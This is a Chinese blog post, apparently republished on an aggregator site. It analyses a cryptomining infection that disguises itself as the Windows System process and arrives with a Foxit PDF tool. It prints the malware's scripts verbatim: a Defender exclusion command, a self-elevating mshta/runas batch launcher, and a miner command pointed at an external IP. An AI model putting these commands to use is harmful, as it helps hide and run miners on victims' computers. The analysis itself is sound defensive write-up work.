挖矿病毒记录 WinRing0x64.sys

news2024/11/27 4:30:57

之前下载过福晰pdf编辑器,使用正常。

某天发现机器启动后,过个几分钟(具体为5min)会自动运行几个 cmd 脚本(一闪而过),但是打开任务管理器没有发现异常程序(后面发现病毒程序伪装成System系统程序,见下图)。这个病毒程序会自动连接位于美国的一个ip地址:104.168.101.23

仔细看程序图标还是可以发现和真正的Windows System图标不一样的,如图:

大家能猜到哪个是假的吗?

病毒的初始化脚本可参考这边博文:记录一次病毒启动脚本-CSDN博客

病毒目录中有两个脚本文件,一个可执行程序,和一个WinRing0x64.sys驱动文件:

add.ps1

CrashReporting.bat

Foxit_license.exe

WinRing0x64.sys

其中 add.ps1是屏蔽微软杀毒软件 defender:

Add-MpPreference -ExclusionPath ($pwd).Path

另外一个启动脚本CrashReporting.bat是病毒启动程序:

@echo off
PUSHD %~DP0 & cd /d "%~dp0"
%1 %2
mshta vbscript:createobject("shell.application").shellexecute("%~s0","goto :target","","runas",1)(window.close)&goto :eof
:target

taskkill /f /t /im  Foxit_license.exe >nul 2>nul

Foxit_license.exe -o 104.168.101.23:34512 -t 1 -B -k

ChatGPT 对其解释如下:

这段代码是一个 Windows 批处理脚本,下面是对其各个部分的解释:

@echo off: 这个命令用于关闭命令行窗口中的命令回显,使得执行时不显示每个命令的内容。

PUSHD %~DP0 & cd /d "%~dp0":

PUSHD %~DP0:将当前目录更改为脚本所在的目录。%~DP0 表示当前批处理文件的驱动器和路径。
cd /d "%~dp0":确保切换到该目录(如果当前目录不同于脚本所在目录)。
%1 %2: 这表示执行传递给脚本的第一个和第二个参数。这些参数是在调用这个批处理文件时提供的。

mshta vbscript:createobject("shell.application").shellexecute("%~s0","goto :target","","runas",1)(window.close)&goto :eof:

此命令使用 mshta 来运行 VBScript,创建一个 Shell 应用程序对象并执行当前脚本(%~s0)。
"goto :target" 是要执行的命令,"runas" 表示以管理员权限运行。
window.close 会在执行后关闭窗口。
&goto :eof 确保脚本在此处结束,不继续执行后面的代码。
:target: 这是一个标签,后面的代码将在跳转到此标签时执行。

taskkill /f /t /im Foxit_license.exe >nul 2>nul:

这条命令强制终止名为 Foxit_license.exe 的进程,/f 表示强制终止,/t 表示终止该进程及其子进程。
>nul 2>nul 用于将输出和错误信息重定向到空设备,即不显示任何输出。
Foxit_license.exe -o 104.168.101.23:34512 -t 8 -B -k:

这条命令启动 Foxit_license.exe,并传递一系列参数:
-o 104.168.101.23:34512:指定一个地址和端口。
-t 8:可能是一个线程或超时设置(具体取决于程序的实现)。
-B 和 -k:这些参数的具体含义取决于 Foxit_license.exe 的实现。
总结:这个批处理脚本的主要功能是切换到脚本所在目录,执行传递的参数,然后以管理员权限终止 Foxit_license.exe 进程,并重新启动它,带有特定的参数。

病毒运行流程:

        通过启动脚本修改注册表,将所有安全设置关闭,检查并配置好病毒程序运行参数,启动延时任务来偷偷触发程序执行。

病毒伪装得很好,各种小技巧都用到了,例如在注册表中将病毒程序 Foxit_license.exe 改名成 System

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2187239.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Ascend C算子加速:优化与创新

Ascend C算子加速:优化与创新 随着大模型的迅速发展和人工智能计算需求的剧增,优化硬件性能变得尤为重要。针对这一需求,昇腾推出了Ascend Operator Library(AOL)算子加速库,专注于为开发者提供高效的算子…

C++-vector模拟实现

###vector底层相当于是数组,查看源码可以发现,这个类的私有成员变量是三个迭代器;在实现时迭代器就可以当作是vector里面的元素的指针类型; ###vector是一个类模板,实现时也应当按照这样的写法用一个模板去实现&#…

某项目实战代码(一)

1.下载安装并配置环境变量openssl,可自行在网上寻找。 2.在项目中导入opensll中的“包含(include)”和“库(lib)” 3.选择debug x86平台,不然会报错。 4.运行结果如下。可自行比对 md5 value: 33b3bc8e05b4fcc16bd531dd9adac166 5.代码如下 #define…

基于STM32的智能家居灯光控制系统设计

引言 本项目将使用STM32微控制器实现一个智能家居灯光控制系统,能够通过按键、遥控器或无线模块远程控制家庭照明。该项目展示了如何结合STM32的外设功能,实现对灯光的智能化控制,提升家居生活的便利性和节能效果。 环境准备 1. 硬件设备 …

unix中的exec族函数介绍

一、前言 本文将介绍unix中exec族函数,包括其作用以及使用方法。当一个进程调用fork函数创建一个新进程后,新进程可以直接执行原本正文段的其他内容,但更多时候,我们在一个进程中调用fork创建新的进程后,希望新进程能…

在pycharm中设置后直接运行js代码

环境: pycharm专业版2020.3.2 已经安装nodejs和npm,并已经加入环境变量。 nodejs的安装参考在pycharm中运行js文件以及附加node.js下载步骤_python_脚本之家 下面开始在pycharm中设置,让其可以直接运行js代码,即需要安装一个叫…

C# 字符与字符串

本课要点: 1、字符类Char的使用 2、字符串类String的使用 3、可变字符串****StringBuilder 4、常见错误 一 何时用到字符与字符串 问题: 输出C#**课考试最高分:**98.5 输出最高分学生姓名:张三 输出最高分学生性别&#x…

六.应用层

目录 ​编辑 4.11 DHCP 6.1应用层的概述 6.2网络应用模型 CS P2P 6.3DNS 域名 www是什么,http是什么,到底什么区别? DNS出现及演化 DNS概括 DNS域名解析过程 6.4FTP FTP客户/服务器 FTP工作原理 FTP传输模式 6.5电子邮件 电…

King of Range 2024牛客国庆集训派对day3

原题 King of Range 解析 m 的值不大, 每次时间在 n logn 以内即可 我们遍历整个数组, 以 i 为右边界, 检测是否有满足条件的左边界, 一次只加上左面的所有可能, 用两个双向队列维护两个单调栈, 一个存最大值, 一个存最小值, 这样可以帮助找到合适的左边界 代码 #include …

JAVA并发编程系列(13)Future、FutureTask异步小王子

美团本地生活面试:模拟外卖订单处理,客户支付提交订单后,查询订单详情,后台需要查询店铺备餐进度、以及外卖员目前位置信息后再返回。 时间好快,一转眼不到一个月时间,已经完成分享synchronized、volatile、…

Linux应用——简易日志

1. 日志要求 对于一个日志来说,我们任认为其应该具有以下的内容 1. 日志时间 2. 日志等级 3. 日志内容 4. 文件名称与行号 在此基础上我们对不同的日志做出分级,即 info: 常规信息 warning: 报警信号 error: 严重信号,可能需要立…

UNIAPP 动态菜单实现方法

1. 封装tabbar组件,组件UI使用uview的tabbar allList 定义出全部的菜单 list 定义当前用户能看到的菜单使用 u-tabbar 渲染出来 list 2. 权限判断处理 3. 使用方式 在 tab 页,底部放入该 tab 组件,并设置当前回显的页面,这里使用…

STM32F407寄存器操作(DMA+I2C)

1.前言 因为后面需要用到大量基础通讯传输的问题,于是今天折腾了一下DMA传输I2C与SPI的效果,其实我先是把DMASPI搞出来了。但是考虑到网上对于STM32的I2C微词颇多,基础的协议都没有调试出来,更遑论DMA控制了,前面调不…

排序算法之——归并排序,计数排序

文章目录 前言一、归并排序1. 归并排序的思想2. 归并排序时间复杂度及空间复杂度3. 归并排序代码实现1)递归版本2)非递归版本 二、计数排序1. 计数排序的思想2. 计数排序的时间复杂度及空间复杂度3. 计数排序代码实现 总结(排序算法稳定性&am…

计算机毕业设计 基于Python的无人超市管理系统的设计与实现 Python+Django+Vue 前后端分离 附源码 讲解 文档

🍊作者:计算机编程-吉哥 🍊简介:专业从事JavaWeb程序开发,微信小程序开发,定制化项目、 源码、代码讲解、文档撰写、ppt制作。做自己喜欢的事,生活就是快乐的。 🍊心愿:点…

深度学习基础—残差网络ResNets

1.残差网络结构 当网络训练的很深很深的时候,效果是否会很好?在这篇论文中,作者给出了答案:Deep Residual Learning for Image Recognitionhttps://www.cv-foundation.org/openaccess/content_cvpr_2016/papers/He_Deep_Residual_…

使用html写一个能发起请求的登录界面

目录 head部分 内联样式部分 body部分 login-form类的div myModal类的div id script部分 总的代码 界面与操作演示 <!DOCTYPE html> <html lang"en"> <!DOCTYPE html> 这是文档类型声明&#xff0c;告诉浏览器这是一个 HTML文档。 <…

jmeter学习(1)线程组与发送请求

1、线程组 执行顺序 &#xff1a;setUp线程组 > 线程组 > tearDown线程组 2、 发送请求 可以发送http、java、dubbo 请求等 下面讲解发送http 1&#xff09;Http请求默认值 作用范围是该线程组下的所有HTTP请求&#xff0c;如果http请求设置的与默认值冲突&#xff0…

前端规范工程-3:CSS规范(Stylelint)

样式规范工具&#xff08;StyleLint&#xff09; Stylelint 是一个灵活且强大的工具&#xff0c;适用于保持 CSS 代码的质量和一致性。结合其他工具&#xff08;如 Prettier 和 ESLint&#xff09;&#xff0c;可以更全面地保障前端代码的整洁性和可维护性。 目录 样式规范工具…

oracle virtualBox 拖动文件到虚拟机内报错

DnD: Error: Drag and drop to guest not possible -- either the guest OS does not support this, or the.... 首先将拖放的双向选项打开 打开CD驱动器 根据操作系统是32还是64安装对应的安装包&#xff0c;amd64为64位系统&#xff0c;x86为32位系统 安装后重启即可向虚拟机…